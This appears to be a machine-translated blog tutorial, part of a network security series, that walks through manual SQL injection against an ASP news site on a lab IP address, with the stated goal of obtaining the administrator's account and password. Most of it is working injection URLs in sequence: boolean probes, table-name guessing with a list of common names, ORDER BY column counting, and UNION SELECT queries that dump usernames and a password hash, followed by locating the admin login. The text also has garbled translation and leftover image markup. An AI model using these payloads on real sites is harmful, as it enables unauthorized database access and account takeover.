SQL injection is one of the most common means for hackers to attack the database, the core idea is that the hacker constructs a database query code after the normal URL that needs to call the database data, and then obtains some desired data according to the returned result. Below we have built a good infiltration platform for SQL injection, the ultimate goal is to obtain the site's administrator account and password. Destination server IP Address: 192.168.80.129, Hacker host IP address: 192.168.80.128.
(1) Find the injection point
Open a Web page and watch the URL.
650) this.width=650; "style=" border-bottom:0px;border-left:0px;border-top:0px;border-right:0px; "title=" image " Border= "0" alt= "image" Src= "Http://img1.51cto.com/attachment/201410/7/70821_1412645085inYh.png" height= "244"/>
Injection point must be similar to "http://192.168.80.129/shownews.asp?id=7" such as the existence of command invocation of the page, "shownews.asp?id=7" is the page value, that is, "id=7" to "shownews.asp page for processing.
We can test this URL by adding and 1=1 and 1=2.
Http://192.168.80.129/shownews.asp?id=7 and 1=1, the webpage will still display normally.
Http://192.168.80.129/shownews.asp?id=7 and 1=2, the Web page does not display properly.
That means "ASP." The addition of our own "and 1=1" is also called as a command parameter, so we can construct some SQL statements to be invoked to execute, thus obtaining the required information, which is called an injection vulnerability. A Web page that can invoke command parameters like this is called an injection point.
(2) Guess the name of the table
The main purpose of the hacker's website infiltration is to get the webmaster user name and password, the user name and password are stored in a table in the background database, so first we have to guess what the name of this data table.
Most of the table names are admin and admin_user, and we can guess the name of the table by adding a statement after the injection point URL:
Http://192.168.80.129/shownews.asp?id=7 and (select COUNT (*) from admin) > 0
"SELECT COUNT (*) from admin" means to count the number of fields in the admin table, and if the admin table exists, then this statement will get a value. With this value compared with >0, the result is definitely set up, so this time the page should be displayed normally. Conversely, if the admin table does not exist, then "SELECT COUNT (*) from the admin" will not get any value, compared with >0, the results are not established, the Web page will not display properly.
If the page does not display properly, you can try again with a different table name until the normal display:
Http://192.168.80.129/shownews.asp?id=7 and (select COUNT (*) from Admin_user) > 0
Http://192.168.80.129/shownews.asp?id=7 and (select COUNT (*) from Manage_user) > 0
The table name of this website is manage_user.
Common table names include: admin sysadmin manger admin123 WebAdmin member Manage_user
Note: If you can't guess the name of the table, you can also use tools such as the Ming boy to help.
650) this.width=650; "style=" border-bottom:0px;border-left:0px;border-top:0px;border-right:0px; "title=" image " Border= "0" alt= "image" Src= "Http://img1.51cto.com/attachment/201410/7/70821_1412645085CYT0.png" height= "426"/>
(3) Guess the number of fields
The next step is to guess which field in the table holds the user name and password, first you need to know a few fields in the data table.
To use the "ORDER BY" statement, "ORDER by" is intended to be sorted by a field, "Order by 10" is sorted by the 10th field, if the 10th field is present, then the page will display normally, otherwise if the page does not display properly, then the 10th field does not exist.
Http://192.168.80.129/shownews.asp?id=7 ORDER BY 11
This way you can guess that there are 11 fields in this table.
(4) Guess field name
The next step is to know which field holds the user name and password, where the Union Select Union query statement is used.
Http://192.168.80.129/shownews.asp?id=7 Union select 1,2,3,4,5,6,7,8,9,10,11 from Manage_user
This will burst the field where the user name and password are stored.
650) this.width=650; "style=" border-bottom:0px;border-left:0px;border-top:0px;border-right:0px; "title=" image " Border= "0" alt= "image" Src= "Http://img1.51cto.com/attachment/201410/7/70821_1412645086bGoz.png" height= "325"/>
The field that holds the user name is generally called username, the field that holds the password is generally called password, and the 2nd and 3rd fields are replaced with these two names:
Http://192.168.80.129/shownews.asp?id=7 Union select 1,username,password,4,5,6,7,8,9,10,11 from Manage_user
The user name and password are then burst.
650) this.width=650; "style=" border-bottom:0px;border-left:0px;border-top:0px;border-right:0px; "title=" image " Border= "0" alt= "image" Src= "Http://img1.51cto.com/attachment/201410/7/70821_1412645087sbOQ.png" height= "335"/>
(5) Guess backstage management entrance
In this 2.0 version of the Southern data template, there is an "administrator login" link itself. Now most of the site will not be set up, so it is generally based on experience to guess, management portal is generally stored in the name of the admin site sub-directory, enter the following address Http://192.168.80.129/admin, will automatically display the management portal.
650) this.width=650; "style=" border-bottom:0px;border-left:0px;border-top:0px;border-right:0px; "title=" image " Border= "0" alt= "image" Src= "Http://img1.51cto.com/attachment/201410/7/70821_1412645087kVbL.png" height= "322"/>
Here you can use the previously burst administrator account and password to log in, but the password "3acdbb255b45d296" is obviously through the MD5 encryption, how can decrypt it? This will be introduced in the next Article blog.
This article from "a pot of turbid wine" blog, reproduced please contact the author!
Network security series of four manual SQL injection (ASP)